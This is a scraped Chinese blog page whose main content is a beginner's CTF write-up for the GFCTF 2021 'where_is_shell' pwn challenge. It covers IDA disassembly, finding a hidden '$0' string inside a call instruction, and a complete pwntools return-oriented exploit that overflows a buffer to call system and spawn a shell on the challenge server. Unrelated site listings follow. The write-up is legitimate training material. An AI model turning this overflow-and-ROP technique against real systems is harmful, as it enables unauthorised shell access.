news 2026/5/1 5:06:58

[GFCTF 2021]where_is_shell

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[GFCTF 2021]where_is_shell

第一次打CTF——PWN篇学习笔记16

在ida中看一看,发现可疑地址

int __fastcall main(int argc, const char **argv, const char **envp) { _BYTE buf[16]; // [rsp+0h] [rbp-10h] BYREF ​ system("echo 'zltt lost his shell, can you find it?'"); read(0, buf, 0x38u); return 0; } __int64 tips() { return MEMORY[0x403569](); }

看了其他师傅的wp,发现这是一个后门函数,在ida中Options-General-Disassembly-Number of opcode bytes改成10即可发现24 30($0)可用于获得shell

.text:0000000000400537 tips proc near .text:0000000000400537 ; __unwind { .text:0000000000400537 55 push rbp .text:0000000000400538 48 89 E5 mov rbp, rsp .text:000000000040053B B8 00 00 00 00 mov eax, 0 .text:0000000000400540 E8 24 30 00 00 call near ptr 403569h .text:0000000000400545 90 nop .text:0000000000400546 5D pop rbp .text:0000000000400547 C3 retn .text:0000000000400547 ; } // starts at 400537 .text:0000000000400547 tips endp
.text:0000000000400548 ; int __fastcall main(int argc, const char **argv, const char **envp) .text:0000000000400548 public main .text:0000000000400548 main proc near ; DATA XREF: _start+1D↑o .text:0000000000400548 .text:0000000000400548 buf = byte ptr -10h .text:0000000000400548 .text:0000000000400548 ; __unwind { .text:0000000000400548 push rbp .text:0000000000400549 mov rbp, rsp .text:000000000040054C sub rsp, 10h .text:0000000000400550 lea rdi, command ; "echo 'zltt lost his shell, can you find"... .text:0000000000400557 call _system .text:000000000040055C lea rax, [rbp+buf] .text:0000000000400560 mov edx, 38h ; '8' ; nbytes .text:0000000000400565 mov rsi, rax ; buf .text:0000000000400568 mov edi, 0 ; fd .text:000000000040056D mov eax, 0 .text:0000000000400572 call _read .text:0000000000400577 mov eax, 0 .text:000000000040057C leave .text:000000000040057D retn .text:000000000040057D ; } // starts at 400548 .text:000000000040057D main endp

取system地址0x400557,据此编写脚本,成功得到flag

from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node4.anna.nssctf.cn",28152) ​ pop_rdi = 0x4005e3 system = 0x400557 backdoor = 0x400540 + 1 ​ payload = cyclic(0x10 + 8) + p64(pop_rdi) + p64(backdoor) + p64(system) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 23:25:58

蓝牙产品做KC认证的流程是怎样的?

蓝牙产品属于带无线通信功能的电子设备,申请 KC 认证需结合韩国 RRA(无线电研究所)的射频合规要求,还需区分强制认证(高风险如带电池的蓝牙耳机)和自律认证(低风险如无电池蓝牙配件)…

作者头像 李华
网站建设 2026/4/23 4:34:56

Python大数据基于深度学习的蘑菇种类识别系统的设计与实现_9u10883y_论文

文章目录系统截图项目简介大数据系统开发流程主要运用技术介绍爬虫核心代码展示结论源码文档获取定制开发/同行可拿货,招校园代理 :文章底部获取博主联系方式!系统截图 Python_9u10883y_ 论文大数据基于深度学习的蘑菇种类识别系统的设计与实现 …

作者头像 李华
网站建设 2026/4/18 8:29:14

Python大数据基于深度学习的饮食计划推荐与交流分享平台_j6yqgmwm--论文

文章目录系统截图项目简介大数据系统开发流程主要运用技术介绍爬虫核心代码展示结论源码文档获取定制开发/同行可拿货,招校园代理 :文章底部获取博主联系方式!系统截图 Python大数据基于深度学习的饮食计划推荐与交流分享平台_j6yqgmwm–论文 项…

作者头像 李华
网站建设 2026/4/22 18:40:26

时间片轮询框架

单片机裸机常常会使用时间篇轮询框架,类似RTOS。参考AI,记录下时间片轮询 1.创建task结构体 typedef struct {uint8_t run; // 任务运行标志uint16_t timer; // 任务计时器uint16_t interval; // 任务执行间隔&a…

作者头像 李华
网站建设 2026/4/25 19:01:32

2025 新年美陈!深莞惠广购物中心活动策划设计公司【力荐】

当新年的钟声即将敲响,城市的大街小巷开始弥漫着喜庆的氛围,深莞惠广这四座充满活力与商业魅力的城市,正迎来一场关于新年美陈与购物中心活动策划设计的盛大狂欢。在这片商业繁荣的土地上,各大购物中心犹如璀璨的星辰,…

作者头像 李华
网站建设 2026/5/1 9:51:12

Python大数据基于深度学习的酒店评论文本情感分析研究_01174x30_论文

文章目录系统截图项目简介大数据系统开发流程主要运用技术介绍爬虫核心代码展示结论源码文档获取定制开发/同行可拿货,招校园代理 :文章底部获取博主联系方式!系统截图 Python_74写0_论文 大数据基于深度学习的酒店评论文本情感分析研究 项目简介…

作者头像 李华